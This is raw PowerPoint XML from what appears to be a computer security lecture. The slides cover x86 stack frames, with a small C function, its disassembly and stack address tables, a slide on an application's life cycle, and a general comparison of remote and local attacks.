            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>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main()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="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 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>(10, 40);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pP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return</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> a;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000"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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 2"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5068261" y="190041"/>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2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</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push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0xc(</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0x8(</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edx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lea (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%edx</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%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,1),</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add $0x1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%eax</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  pop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ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>main</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push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solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>sub $0x18,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>%esp</a:t>
            </a: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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0x28,0x4(</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movl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> $0xa,(</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esp</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call </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="accent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%eax</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>,-0x4(</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err="1">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>mov</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t> -0x4(</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eax</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="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leave</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:rPr>
              <a:t>  ret</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="80000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:latin typeface="Consolas" charset="0"/>
              <a:ea typeface="Consolas" charset="0"/>
              <a:cs typeface="Consolas" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="5" name="Group 4"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="3265291"/>
            <a:ext cx="1756527" cy="830903"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="7" name="Right Bracket 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5588522" y="1927879"/>
              <a:ext cx="1374741" cy="3353983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>prologue</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Group 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="5659908"/>
            <a:ext cx="1756527" cy="709842"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="6881075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="Right Bracket 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1" name="TextBox 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927883"/>
              <a:ext cx="1374741" cy="5071996"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>epilogue</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="12" name="Group 11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="506830"/>
            <a:ext cx="1756527" cy="576903"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Right Bracket 1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4" name="TextBox 13"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927879"/>
              <a:ext cx="1374741" cy="3353983"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>prologue</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="3654189" y="2366075"/>
            <a:ext cx="1756527" cy="633380"/>
            <a:chOff x="5206736" y="118804"/>
            <a:chExt cx="1756527" cy="6881075"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Right Bracket 15"/>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7" name="TextBox 16"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5588522" y="1927883"/>
              <a:ext cx="1374741" cy="5071996"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>epilogue</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="79411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2"/>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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Right Arrow 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ectangle 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1991529" y="5377554"/>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991529" y="6125240"/>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991529" y="572752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4023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
                                            <p:txEl>
                                              <p:pRg st="19" end="1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xEl>
                                              <p:pRg st="22" end="2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xEl>
                                              <p:pRg st="23" end="2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7">
                                            <p:txEl>
                                              <p:pRg st="24" end="2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7">
                                            <p:txEl>
                                              <p:pRg st="25" end="25"/>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7">
                                            <p:txEl>
                                              <p:pRg st="26" end="26"/>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7">
                                            <p:txEl>
                                              <p:pRg st="27" end="27"/>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7">
                                            <p:txEl>
                                              <p:pRg st="28" end="28"/>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7">
                                            <p:txEl>
                                              <p:pRg st="29" end="29"/>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7">
                                            <p:txEl>
                                              <p:pRg st="31" end="31"/>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7">
                                            <p:txEl>
                                              <p:pRg st="32" end="32"/>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7">
                                            <p:txEl>
                                              <p:pRg st="33" end="33"/>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7">
                                            <p:txEl>
                                              <p:pRg st="34" end="34"/>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7">
                                            <p:txEl>
                                              <p:pRg st="35" end="35"/>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7">
                                            <p:txEl>
                                              <p:pRg st="36" end="36"/>
                                            </p:txEl>
                                          </p:spTgt>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7">
                                            <p:txEl>
                                              <p:pRg st="37" end="37"/>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7">
                                            <p:txEl>
                                              <p:pRg st="38" end="38"/>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7">
                                            <p:txEl>
                                              <p:pRg st="39" end="39"/>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7">
                                            <p:txEl>
                                              <p:pRg st="40" end="4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12"/>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8"/>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0" nodeType="clickEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="122" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="14"/>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8" grpId="0" animBg="1"/>
      <p:bldP spid="12" grpId="0" animBg="1"/>
      <p:bldP spid="14" grpId="0" animBg="1"/>
      <p:bldP spid="15"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6" name="Right Arrow 1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33738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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2c0</a:t>
                      </a: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232526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58344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Remote vs. Local Attacks </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Local attacks </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to manipulate the behavior of an application through local interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Require a previously-established presence on the host (e.g., an account, or another application under the control of the attacker)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to execute operations with privileges that are different (usually superior) from the ones that the attacker would otherwise have</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In general these attacks are easier to perform, because the attacker has a better knowledge of the environment</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph sz="half" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="62500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remote attacks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to manipulate the behavior of an application through network-based interaction</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unauthenticated remote attacks: Interaction with the application does not require authentication or prior capabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Allow one to execute operations with the privileges of the vulnerable application</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In general, are more difficult to perform but they do not require prior access to the system</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="92486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0xfd2c0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0x80483a6</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57933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0x80483a6</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691045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6374" y="35904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289782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0x80483a8</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66374" y="35904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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="152854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0x80483ab</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0468" y="38700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207407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0x80483ab</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0468" y="38700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10565052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0x80483b3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0468" y="41553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12889097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0x80483b3</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0468" y="41553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10384528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0xfd2b8</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0x80483ba</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6781398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0x80483ba</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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="801046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Life of an Application</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Content Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Author writes code in high-level language</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application is translated in some executable form and saved to a file</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Interpretation vs. compilation</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application is loaded in memory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application is executed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The application terminates</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="71904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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="61937448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0xfd2b4</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374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97729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147037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dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2d0</a:t>
                      </a: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0x8048394</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53312850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0xfd2d0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8726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7819868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0x8048395</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8726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104569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0x8048397</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18" name="Right Arrow 1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Tree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21193829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a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRP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0x8048397</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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="22" name="Group 21"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="0" y="306534"/>
            <a:ext cx="1374741" cy="1851450"/>
            <a:chOff x="5050323" y="118804"/>
            <a:chExt cx="1374741" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="23" name="Right Bracket 2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4" name="TextBox 23"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5050323" y="1982433"/>
              <a:ext cx="1374741" cy="1669982"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>main</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="-15555" y="2157984"/>
            <a:ext cx="1374741" cy="1851450"/>
            <a:chOff x="5050323" y="118804"/>
            <a:chExt cx="1374741" cy="5909348"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="26" name="Right Bracket 25"/>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7" name="TextBox 26"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5050323" y="1982433"/>
              <a:ext cx="1374741" cy="1669982"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                  <a:latin typeface="Consolas" charset="0"/>
                  <a:ea typeface="Consolas" charset="0"/>
                  <a:cs typeface="Consolas" charset="0"/>
                </a:rPr>
                <a:t>callee</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="Consolas" charset="0"/>
                <a:ea typeface="Consolas" charset="0"/>
                <a:cs typeface="Consolas" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" sz="1400" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="Right Arrow 2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859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extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="20000"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0xfd2c0</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10000"/>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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US" dirty="0">
                        <a:latin typeface="Consolas" charset="0"/>
                        <a:ea typeface="Consolas" charset="0"/>
                        <a:cs typeface="Consolas" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="10003"/>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r h="344473">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" dirty="0">
                          <a:latin typeface="Consolas" charset="0"/>
                          <a:ea typeface="Consolas" charset="0"/>
                          <a:cs typeface="Consolas" charset="0"/>
                        </a:rPr>
                        <a:t>0x28</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
